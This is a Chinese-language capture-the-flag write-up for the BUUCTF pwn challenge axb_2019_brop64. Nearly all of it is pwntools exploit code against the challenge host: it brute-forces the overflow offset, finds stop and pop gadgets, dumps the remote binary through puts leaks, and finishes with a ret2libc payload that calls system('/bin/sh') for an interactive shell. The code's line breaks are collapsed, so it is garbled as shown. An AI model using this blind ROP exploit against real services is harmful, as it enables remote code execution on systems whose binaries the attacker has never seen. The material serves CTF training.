BUUCTF Pwn axb_2019_brop64 题解

这题是BROP 所以不下文件

先nc一下看看：

先要找到栈溢出长度：

from pwn import *
import timedef getsize():i = 1while True:try:p = remote("node5.buuoj.cn", 29367)p.sendafter("Please tell me:", b'a' * i)time.sleep(0.1)data = p.recv()p.close()if b"Goodbye!" not in data:return i - 1else:i += 1except EOFError:p.close()return i - 1size = getsize()
print(size)

运行后 找到溢出长度为216：

接下来，找stop gadget 这里用main函数作为stop gadget：

def getStopGadget():address = 0x4007d0while True:try:p = remote("node5.buuoj.cn", 29367)payload = b'a' * 216 + p64(address)p.sendafter("Please tell me:", payload)print(payload)time.sleep(0.1)buf = p.recv()print(buf)output = p.recv()print(output)if b"Hello" not in output:p.close()address += 1else:return addressexcept EOFError:address += 1p.close()

找到gadget是0x4007d6

接下来要找brop gadgets 用csu_init的：

def GetBropGadget(size, stop_gadget, addr):try:p = remote("node5.buuoj.cn", 29367)payload = b'a' * size + p64(addr) + p64(0) * 6 + p64(stop_gadget) + p64(0) * 10p.sendafter("Please tell me:", payload)time.sleep(0.1)buf = p.recv()print(buf)output = p.recv()p.close()print(output)if b"Hello" not in output:return Falsereturn Trueexcept EOFError:p.close()return Falsedef Check(size, addr):try:p = remote("node5.buuoj.cn", 29367)payload = b'a' * size + p64(addr) + p64(0) * 10p.sendafter(b'Please tell me:', payload)time.sleep(0.1)output = p.recv()p.close()print(output)return Falseexcept EOFError:p.close()return True
addr = 0x400900
while True:print(hex(addr))if GetBropGadget(216,0x4007d6,addr):print("brop gadget: 0x%x"% addr)if Check(216,addr):print("brop gadget: 0x%x"% addr)breakaddr+=1

找到是0x40095a

找到了6个pop的地址 这个地址+9即为pop_rdi_ret 的地址

接下来找puts函数的PLT ：

def getputsplt(size, pop_rdi_ret, stop_gadget):addr = 0x400600while True:print(hex(addr))try:p = remote("node5.buuoj.cn", 29367)payload = b'a'*size + p64(pop_rdi_ret) + p64(0x400000) + p64(addr) + p64(stop_gadget)p.sendafter(b'Please tell me:', payload)time.sleep(0.1)buf = p.recv()output = p.recv()p.close()if b'\x7fELF' in output: #ELF文件的头部魔数print('puts plt address = 0x%x' % (addr))return (addr)addr += 1except EOFError:p.close()addr += 1

接下来找puts的GOT：

def leak(size, pop_rdi_ret, puts_plt, leak_addr,stop_addr):p = remote("node5.buuoj.cn", 29367)payload = b'a'*size + p64(pop_rdi_ret) + p64(leak_addr) + p64(puts_plt) + p64(stop_addr)p.sendafter(b'Please tell me:', payload)p.recvuntil(b'a' * size)p.recv(3)try:output = p.recv(timeout=1)p.close()try:output = output[:output.index(b"\nHello,I am a computer")]print(output)except Exception:output = outputif output == b"":output = b"\x00"return outputexcept Exception:p.close()return None
def dump_file(size, pop_rdi_ret, puts_plt,addr,stop_addr):result = b''while addr < 0x400835:print(hex(addr))output = leak(size, pop_rdi_ret, puts_plt,addr,stop_addr)if output is None:result += b'\x00'addr += 1continueelse:result += outputaddr += len(output)with open('dump_file','wb') as f:f.write(result)

生成的文件用IDA打开 二进制格式

之后在Edit->Segments->Rebase program 重设基地址为开始打印的地址：

找到对应plt地址：

puts GOT地址为 0x601018

接下来就是正常的libc：

def exp(size,pop_rdi_ret,puts_got,puts_plt,stop_gadget):p = remote("node5.buuoj.cn", 29367)libc = ELF('./libc-2.23.so')ret = 0x40095a + 0x9 + 0x5payload = b'a' * size + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(stop_gadget)p.sendafter(b'Please tell me:', payload)p.recvuntil(b'a'*size)p.recv(3)func_addr = p.recv(6)puts_addr = u64(func_addr.ljust(8,b'\x00'))print(hex(puts_addr))offset = puts_addr - libc.symbols['puts']system = offset + libc.symbols['system']binsh = offset + next(libc.search("/bin/sh\x00"))payload2 = b'a' * size + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system)p.sendafter(b'Please tell me:', payload2)p.interactive()exp(size, pop_rdi_ret, puts_got, puts_plt, stop_gadget)

运行 得到flag：

好长🫥